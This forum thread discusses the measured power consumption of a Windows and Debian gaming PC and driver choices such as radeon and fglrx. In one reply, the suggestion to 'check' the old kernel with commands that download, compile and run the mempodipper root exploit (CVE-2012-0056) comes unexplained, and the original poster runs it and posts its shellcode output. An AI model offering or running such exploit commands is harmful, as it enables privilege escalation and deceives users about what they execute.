Power consumption figures with the AMD OS driver

Collapse
X

• Filter
  • Time
  • Show
Clear All

• Power consumption figures with the AMD OS driver

Though I would put this up on a new thread as people may find this of interest.
    I measured power consumptiion of on of my sytems running a small number of different configurations it may be of interest. The mearuring device is currently availble cheaply but has been checked against a known accurate power meter and found to be almost spot on.

The system is essentialy a 3D gaming and game development system, bye the way, the figures given here I find to be typical for this type of system.
    The system even in hot weather does NOT in any way get much more than warm........ GOOD!!!

Description of system

Case Corsair 800D
    PSU Corsair HX-650
    MB ASUS P6X58D Premium
    CPU Intel i7 950 at 3.0Ghz (not over clocked)
    Memory 12 Gbytes
    Graphics card ATI Radeon HD5870

Power consumption
    1. sitting on bios screen 140w

Windows XP pro service pack 3
    2. no apps running 142w
    3. Openrails V0.7 (3D train simulator) 260-307w

Linux Debian 6.0.1 Custom kernel 2.6.39.4 open source radeon driver
    4. sitting at LILO prompt 200w
    5. running Xserver, window manager fvwm 207w
    6. Xine viewing 1920x1080 H264 video 214-222w

Note item 4, this is the LILO prompt BEFORE the kernel has started,Windows manages to get the power down to the bios level, even the Linux boot system does not manage this.

Item 3, power consumpion varied for no dicernable reason, did not vary with frame rate or object density on the screen although power does increase with increased cpu usage.

Also, the H264 video is being decoded by the cpu taking aprox 30% of a single cpu the power this takes is only 16w.

With the monitor the power consumed is close to 250 watts, this means 1 dollar Australian will run the system for around 10 hours.
    I find it curious that windows gets the power down almost to the bios level whereas even the Linux boot program does not acheive this. So one assumes Microsoft must have gone to some lengths to get the power consumption down.

Blacksmith

Oops, one thing I forgot for item 3, the Openrails train simulator this takes most of two cpus's to run, the train simulator actualy having 4 threads.

Blacksmith

Comment

Would be nice to have some more information: Radeon? Which power profile? Do you have the power-save module for the CPU loaded and which governor are you using?
      Last edited by TobiSGD; 01 July 2012, 03:00 AM.

Comment

The idle values look very bad. Btw. even with squeeze you can use kernel 3.5rc5, no problem at all. Be sure you enable powermanagement for the cpu, thats even needed for turbo modes. Usually a new system should be much below 100w idle, systems with i7-3 should be even below 50w without addional gfx card. Btw. whats the problem to use fglrx with squeeze? up to kernel 3.3 just run my script:

to uninstall you can use this one:

maybe compare that powermanagement... You could at least install kernel 3.2 from debian backports if you dont want to compile it yourself. but kernel 2.6.39.4? maybe check if
        Code:
        wget -O mempodipper.c 'http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c?h=fedora'
        gcc -o mempodipper mempodipper.c
        ./mempodipper
        works with it...

Comment

Thanks for the feedback, I posted this in case i was doing something strange, as far as I am aware no power profiling or any thing like that is done in the kernel I will look into it as it would be nice to reduce the power consumption.
          In fact I have a 3.3.x kernel compiled for the systems, Note all three of my systems use the same kernel. But this later kernel will have basicly the same options as does the current kernel.
          One of the main reasons for not using the later item is that it regularly locked up the xorg drm driver, something a net search showed was a known problem.

The problem with fglrx for me is VERY slow 2D performance under certain specific conditions. These include changing the background image and redrawing the background after a window closes. The performance of these on my Samsung 2560x1600 is best to say pathetic, even on my 1920x1200's its not that great (Note, I found the 3D performance with the closed src driver excellent). On the Samsung one can see the background being redrawn, taking around 0.2 of a second to complete, The open source driver is WAY faster. AMD recently requested bug reports to be submited, I may set up one of my systems with FGLRX to provide them with info on this problem, they cannot find a problem if they do not know about it.
          Note, I have never had any trouble installing fglrx, now I have used Kano's script but it requires a decent internet connection something I simply do not have. Most of my downloading being done in town at an internet cafe.

Comment

This is the output of mempodipper.........

zlinw@wolfxaser6:~$ ./mempodipper
            ===============================
            = Mempodipper =
            = by zx2c4 =
            = Jan 21, 2012 =
            ===============================

[+] Opening socketpair.
            [+] Waiting for transferred fd in parent.
            [+] Executing child from child fork.
            [+] Opening parent mem /proc/1953/mem in child.
            [+] Sending fd 6 to parent.
            [+] Received fd at 6.
            [+] Assigning fd 6 to stderr.
            [+] Reading gpasswd for exit@plt.
            [+] Resolved exit@plt to 0x8049ccc.
            [+] Calculating gpasswd padding.
            [+] Seeking to offset 0x8049cbc.
            [+] Executing gpasswd with shellcode.
            gpasswd: group '1??€1?.?€1?????€1?Phn/shh//bi‰?1?f?-iR‰?1?RPS‰?1?1??
            ?€' does not exist in /etc/group
            -----------------------end fragment----------------------------------------------

The login failed so I assume it could not correctly crack the system.

I will keep this in mind of course, thanks.

Comment

You can use the script with -p option. That shows the version it wants to download. When it is a "normal" release just like 12-6 just put the run file in /usr/src. for beta releases look into the code. Best is to remove the driver completely with the other script, reboot and then install fglrx in case you want to update. in that case the settings are resetted. btw. if you manage to get xbmc fernet menta do that with sux (not su):
              Code:
              aticonfig --set-pcs-u32=MCIL,HWUVD_H264Level51Support,1
              Do you have got cpufrequtils package installed? This would help to save power and gives you more speed. Btw your kernel should have got:
              Code:
              CONFIG_X86_ACPI_CPUFREQ=y
              As module would also work.

Comment

Working...
              X